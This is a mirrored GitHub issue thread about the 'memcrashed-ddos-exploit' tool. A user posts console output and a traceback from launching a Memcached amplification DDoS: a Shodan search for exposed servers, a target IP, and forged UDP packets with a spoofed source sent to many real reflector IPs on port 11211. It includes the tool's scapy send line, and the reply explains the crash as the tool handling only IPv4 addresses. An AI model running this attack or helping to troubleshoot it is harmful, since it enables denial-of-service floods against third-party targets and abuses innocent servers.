GithubHelp home page GithubHelp logo

IPv6 Error about memcrashed-ddos-exploit HOT 1 CLOSED

649 avatar 649 commented on July 22, 2024
IPv6 Error

from memcrashed-ddos-exploit.

Comments (1)

CrimsonTorso avatar CrimsonTorso commented on July 22, 2024

*] Use Shodan API to search for affected Memcached servers? <Y/n>: y
[] Checking Shodan.io API Key: key [✓] API Key Authentication: SUCCESS [] Number of bots: 32961

[] Save results for later usage? <Y/n>: y [~] File written: ./bots.txt [] Would you like to use locally stored Shodan data? <Y/n>: y
[▸] Enter target IP address: IP. [▸] Enter target port number (Default 80): 80
[▸] Enter preferred power (Default 1): 1
[+] Enter payload contained inside packet:
[] Would you like to display all the bots from Shodan? <Y/n>: n [] Would you like to display all the bots stored locally? <Y/n>: n
[*] Ready to engage target IP? <Y/n>: y
[+] Sending 1 forged UDP packet to: 103.21.148.134 .[+] Sending 1 forged UDP packet to: 23.225.239.38
.[+] Sending 1 forged UDP packet to: 209.141.39.89 .[+] Sending 1 forged UDP packet to: 119.29.254.55
.[+] Sending 1 forged UDP packet to: 118.244.234.81.[+] Sending 1 forged UDP packet to: 193.109.144..........

Error
+] Sending 1 forged UDP packet to: 199.66.200.177.[+] Sending 1 forged UDP packet to: 116.228.231.107 .[+] Sending 1 forged UDP packet to: 2a02:c200:1:10:2:6:4103:1
Traceback (most recent call last): File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 238, in h2i inet_aton(x) OSError: illegal IP address string passed to inet_aton
During handling of the above exception, another exception occurred:
Traceback (most recent call last): File "Memcrashed.py", line 135, in
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 240, in call i.init(*args, **kargs)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
es/scapy/packet.py", line 134, in init
self.fields[f] = self.get_field(f).any2i(self, v)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 259, in any2i
return self.h2i(pkt,x) File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/fields.py", line 240, in h2i x = Net(x)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 90, in init self.parsed,self.netmask = self._parse_net(net)
File "/home/msfdev/.local/lib/python3.5/site-packages/scapy/base_classes.py", line 83, in _parse_net tmp[0]=socket.gethostbyname(tmp[0])
socket.gaierror: [Errno -9] Address family for hostname not supported

Please help.

It's because the Memcrashed.py encountered a IPv6 IP address. It's only been programmed to interact with IPv4 IPs and read them.

from memcrashed-ddos-exploit.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.